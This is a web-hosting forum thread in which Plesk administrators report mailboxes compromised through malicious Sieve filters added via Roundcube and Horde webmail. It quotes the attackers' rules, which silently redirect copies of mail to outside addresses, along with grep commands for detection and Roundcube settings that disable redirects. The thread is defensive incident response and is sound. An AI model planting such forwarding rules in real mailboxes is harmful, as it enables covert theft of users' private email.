• Please be aware: Kaspersky Anti-Virus has been deprecated
    With the upgrade to Plesk Obsidian 18.0.64, "Kaspersky Anti-Virus for Servers" will be automatically removed from the servers it is installed on. We recommend that you migrate to Sophos Anti-Virus for Servers.
  • The Horde webmail has been deprecated. Its complete removal is scheduled for April 2025. For details and recommended actions, see the Feature and Deprecation Plan.
  • We’re working on enhancing the Monitoring feature in Plesk, and we could really use your expertise! If you’re open to sharing your experiences with server and website monitoring or providing feedback, we’d love to have a one-hour online meeting with you.

Issue dovecot / roundcube sieve hack

tkalfaoglu

tkalfaoglu

Silver Pleskian
Today a customer complained that their email might be compromised.
I found that a single email address had a sieve added:

.dovecot.sieve -> sieve/roundcube.sieve

and that file contained:
# rule:[.]
if allof (header :contains "from" "@")
{
redirect :copy "[email protected]";
}
require ["copy"];

PS: You may wish to do a check of your systems, just do a:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec echo grep redirect {} \;

My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Thanks, -tk
 
PS: this gmail email address appears in the whois registry of prornec.com which is located in Lagos, Nigeria!
 
PS: Looking at PLESK mail accounts page, there appears to be NO redirect.
Perhaps PLESK should also check these sieve settings when it displays the list of emails - and not only the redirects that have been placed using the PLESK interface..
 
prornec.com domain was hosted in servers in Romania, with IP ranges of:
45.89.175.0 - 45.89.175.255
 
Sorry - the command should have been:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec grep redirect {} \;

the echo was my debug version :) -t
 
tkalfaoglu said:
My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Click to expand...
Have a look a the config file from Roundcubes managesieve plugin. There are some options that might prevent creating similar rules trough Roundcube. The $config['managesieve_raw_editor'] and $config['managesieve_forward'] seem useful options to restrict in this regard.

Needless to say that it is always best to make every effort to protect user/email accounts so to prevent unauthorized access in the first place.
 
Many thanks.. the forward option does not contain a disable option..

Code: 
// Enables separate management interface for setting forwards (redirect to and copy to)
// 0 - no separate section (default),
// 1 - add Forward section,
// 2 - add Forward section, but hide Filters section
$config['managesieve_forward'] = 0;

In any case, I changed it to 2 and will check its impact. Likewise I'm going to disable the managesieve plugin.
 
I noticed the same issue with Horde as well. Someone hacked some people's ingo.sieve files to put redirects..
Nothing visible in the plesk interface, so I assume it was done via the horde interface.
 
We had same issue, highly recommend every one to check their sieve(.dovecot.sieve, roundcube.sieve, ingo.sieve) files, you can check with this simple line:

find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep 'copy'
or
find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep '@'

Notice, some of these filters can be user set, check them with users.


Sample of our findings:


#1

if allof (header :contains "subject" "@")
{
redirect :copy "[email protected]";
}
require ["fileinto"];
require "fileinto";

#2

if true
{
redirect :copy "[email protected]";
}
 
Just to document here in case anyone else if ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code: 
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
 
ChristophRo said:
Just to document here in case anyone else if ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code: 
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
Click to expand...
As an additional note, this only works for RC version 1.5 and up. Which is currently is not available on Plesk for CentOS 7.9 and Ubuntu 18.04.
 
You must log in or register to reply here.

Similar threads

M
Issue Qmail / Dovecot - mail forwarding fails endlessly
Replies
5
Views
2K
mw004
M
T
Resolved dovecot webmail filters missing after upgrade 17.5 to 17.8#4
Replies
1
Views
2K
TomBoB
T
G J Piper
Resolved Global Dovecot Sieve Rule?
Replies
17
Views
15K
giannisantoua
G
N
Issue [PPP-27056] Sendmail problems w/ sieve
Replies
12
Views
3K
IgorG
IgorG
A
Postfix + Dovecot / Slapd Authentication - dovecot lda uidnumber Error
Replies
0
Views
2K
AhmadR
A
Back
Top